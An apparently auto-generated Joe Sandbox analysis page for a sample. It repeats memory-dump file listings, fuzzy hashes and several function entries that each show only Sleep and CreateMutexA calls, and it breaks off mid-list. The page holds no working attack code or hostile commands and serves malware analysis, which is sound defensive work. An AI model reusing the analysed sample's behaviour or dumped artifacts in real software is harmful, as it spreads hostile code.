Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: fd5602f6d05a7ba6bd7aa16d70f16774bd765e3155caf749f8575b12776752b3
Instruction ID: 734aae922150e3f999e2ddde0548e3b9cdd2041a7e4ed6b63116edc84d367743
Opcode Fuzzy Hash: fd5602f6d05a7ba6bd7aa16d70f16774bd765e3155caf749f8575b12776752b3
Instruction Fuzzy Hash: 6F314831B043119BEF08DBACDC89B5DB7A2EB86311F248319EC149B3D1C77589888B36

Function 00D5A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: a5ea0cc83c7096be40dd370dfbc78fbfad455dfc0ebc7e971494f8aa3ba6a9e9
Instruction ID: 849c5196ab0fb191bd24ae6231384c94f850d879fada24d8d92cba82c167a36a
Opcode Fuzzy Hash: a5ea0cc83c7096be40dd370dfbc78fbfad455dfc0ebc7e971494f8aa3ba6a9e9
Instruction Fuzzy Hash: F9313B31A042109BEF18DBBCD889B6DB762EF81311F248318EC549B3D5D7B589848B72

Function 00D5A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 56bba04bfbd69fe940af5621db554263632e25f22869e199f2159e74289c03da
Instruction ID: f0e4c7a75dc9ca2e59937f2806305dc94352f3bba5fabe2e897ad704110a95a2
Opcode Fuzzy Hash: 56bba04bfbd69fe940af5621db554263632e25f22869e199f2159e74289c03da
Instruction Fuzzy Hash: 7A312A31A042118BEF18DB7CDC85B6DB7A2EBC5315F248718EC549B3D1D77589848B32

Function 00D5A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: b2ba0c6c5455fe16bce9c83f6c58275db49493cb8a05abcc1edf686cd6902526
Instruction ID: 7771c608fcaefbd3e92eacd902340688dadc7b529c268f8138610f48861f6c80
Opcode Fuzzy Hash: b2ba0c6c5455fe16bce9c83f6c58275db49493cb8a05abcc1edf686cd6902526
Instruction Fuzzy Hash: 75311631A142159BEF18DB7CDC89B6DB7A2EB85321F248718EC149B3D1C77589888B72

Function 00D59ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1410f6a22f0fc8b839f8b86e0d452005f3a22cc46e8fd91767df415a0009d38e
Instruction ID: 58b11c9ca5e0738e36bdde5c10a18fb8ade44cc66671f494525766dd02e409b3
Opcode Fuzzy Hash: 1410f6a22f0fc8b839f8b86e0d452005f3a22cc46e8fd91767df415a0009d38e
Instruction Fuzzy Hash: 1D210331654311DBEF189B6CEC85B6CF762EBC1311F244319EC188B2D5D7B599848A32

Function 00D5A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F3F000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359545297.0000000000F4C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359601670.0000000000F5F000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359631487.0000000000F61000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359657696.0000000000F62000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359683868.0000000000F66000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359711488.0000000000F77000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359736163.0000000000F78000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359760761.0000000000F7B000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359785127.0000000000F7C000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359811048.0000000000F86000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359836047.0000000000F91000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359865432.0000000000FAC000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359896308.0000000000FB3000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359917473.0000000000FB4000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359949602.0000000000FB8000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359978106.0000000000FBF000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360004160.0000000000FC0000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360030574.0000000000FCB000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360058543.0000000000FCE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360083218.0000000000FD6000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360108877.0000000000FDE000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360139906.0000000000FE5000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360166313.0000000000FE7000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360196166.0000000001004000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001005000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360222344.0000000001024000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360281028.0000000001052000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360305378.0000000001053000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360328056.0000000001058000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360350309.000000000105A000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2360377199.0000000001067000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d50000_8WYS1MQTL0QCOHKIPL8.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2d9a6d00e9b1c7088f91aa2f2ad8bfd07d3ae8c5acd06e904c92360269c98f83
Instruction ID: ece7f991bf0432f4c600ad70a4c751d730620385ae56a8222e546f5ae2d077a8
Opcode Fuzzy Hash: 2d9a6d00e9b1c7088f91aa2f2ad8bfd07d3ae8c5acd06e904c92360269c98f83
Instruction Fuzzy Hash: C9216D31248311CBEF28A76C989676DBB62DF81302F284A16ED44D63C1CB76898D9673

Function 00D5A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00D5A963
CreateMutexA.KERNEL32(00000000,00000000,00DB3254), ref: 00D5A981

Memory Dump Source

Source File: 00000005.00000002.2359244276.0000000000D51000.00000040.00000001.01000000.00000006.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000005.00000002.2359222309.0000000000D50000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359244276.0000000000DB2000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359322317.0000000000DB9000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359347443.0000000000DBB000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359376160.0000000000DC7000.00000080.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359492979.0000000000F2D000.00000040.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2359515161.0000000000F2F000.00000080.00000001.01000000.00000006.sdmpDownload File
